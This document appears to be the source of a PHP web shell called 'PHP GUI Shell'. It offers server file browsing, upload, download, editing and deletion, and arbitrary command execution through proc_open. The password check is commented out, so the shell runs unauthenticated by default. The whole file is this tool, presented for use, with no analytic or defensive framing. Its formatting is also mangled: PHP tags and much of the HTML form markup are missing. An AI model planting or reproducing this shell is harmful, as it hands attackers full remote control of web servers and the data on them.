/*// === AUTH (Optional - Remove for open use) ===$auth_user = "admin";$auth_pass = "pass123";if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER'] !== $auth_user || $_SERVER['PHP_AUTH_PW'] !== $auth_pass) { header('WWW-Authenticate: Basic realm="Restricted"'); header('HTTP/1.0 401 Unauthorized'); echo 'Auth required.'; exit;}*/// === MAIN PATH HANDLING ===$cwd = isset($_GET['path']) ? realpath($_GET['path']) : getcwd();if (!$cwd || !is_dir($cwd)) $cwd = getcwd();// === Download File ===if (isset($_GET['download'])) { $file = realpath($_GET['download']); if (strpos($file, $cwd) === 0 && is_file($file)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); header('Content-Length: ' . filesize($file)); readfile($file); exit; }}// === Upload File ===if (isset($_POST['upload'])) { $dest = rtrim($cwd, '/') . '/' . basename($_FILES['file']['name']); move_uploaded_file($_FILES['file']['tmp_name'], $dest); header("Location: ?path=" . urlencode($cwd)); exit;}// === Delete File/Folder ===if (isset($_GET['delete'])) { $target = realpath($_GET['delete']); if (strpos($target, $cwd) === 0) { if (is_file($target)) unlink($target); elseif (is_dir($target)) rmdir($target); } header("Location: ?path=" . urlencode($cwd)); exit;}// === Command Execution ===$output = '';if (isset($_POST['cmd']) && strlen(trim($_POST['cmd'])) > 0) { $x = $_POST['cmd']; $descr = [ 0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w'] ]; $pipes = []; $process = proc_open($x, $descr, $pipes); if (is_resource($process)) { while ($f = fgets($pipes[1])) { $output .= "[stdout] " . htmlspecialchars($f); } fclose($pipes[1]); while ($f = fgets($pipes[2])) { $output .= "[stderr] " . htmlspecialchars($f); } fclose($pipes[2]); proc_close($process); } else { $output = "Failed to execute command."; }}// === File Edit Save ===$editMsg = '';if (isset($_POST['save_edit']) && isset($_POST['edit_path'])) { $editPath = $_POST['edit_path']; $newContent = $_POST['filecontent']; if (is_file($editPath) && strpos(realpath($editPath), $cwd) === 0) { file_put_contents($editPath, $newContent); $editMsg = "✅ File saved successfully."; }}<!DOCTYPE html> <meta charset="utf-8">PHP GUI Shell <title>PHP GUI Shell</title> <style> body { font-family: monospace; background: #111; color: #0f0; padding: 20px; } a { color: #6cf; text-decoration: none; } a:hover { text-decoration: underline; } table { width: 100%; border-collapse: collapse; } td, th { padding: 5px; border-bottom: 1px solid #444; } textarea, input[type="text"], input[type="file"] { width: 100%; background: #000; color: #0f0; border: 1px solid #444; padding: 5px; } textarea { height: 300px; } input[type="submit"], button { background: #222; color: #0f0; border: 1px solid #444; padding: 5px 15px; cursor: pointer; } </style>

📁 Path: = htmlspecialchars($cwd)

<th>Name</th><th>Size</th><th>Actions</th> if ($cwd !== '/') : endif; foreach (scandir($cwd) as $item): if ($item === '.') continue; $full = $cwd . DIRECTORY_SEPARATOR . $item; $url = urlencode($full); endforeach;
<a href="?path== urlencode(dirname($cwd)) ">⬅️ .. (parent)</a>
if (is_dir($full)): <a href="?path== $url ">📁 = htmlspecialchars($item) </a> else: <a href="?download== $url ">📄 = htmlspecialchars($item) </a> endif; = is_file($full) ? filesize($full) . " bytes" : '-' if (is_file($full)): <a href="?edit== $url ">✏️ Edit</a> | endif; <a href="?delete== $url " onclick="return confirm('Delete = $item ?')">🗑️ Delete</a>

📤 Upload File

🔧 Execute Command

if (!empty($output)):

🖨️ Command Output

<textarea readonly>= $output </textarea> endif; // === File Edit UI ===if (isset($_GET['edit'])): $editPath = realpath($_GET['edit']); if (is_file($editPath) && strpos($editPath, $cwd) === 0): $code = htmlspecialchars(file_get_contents($editPath));

✏️ Editing: = htmlspecialchars($editPath)

if ($editMsg) echo "<p>$editMsg</p>";
<textarea name="filecontent">= $code </textarea>
endif;endif;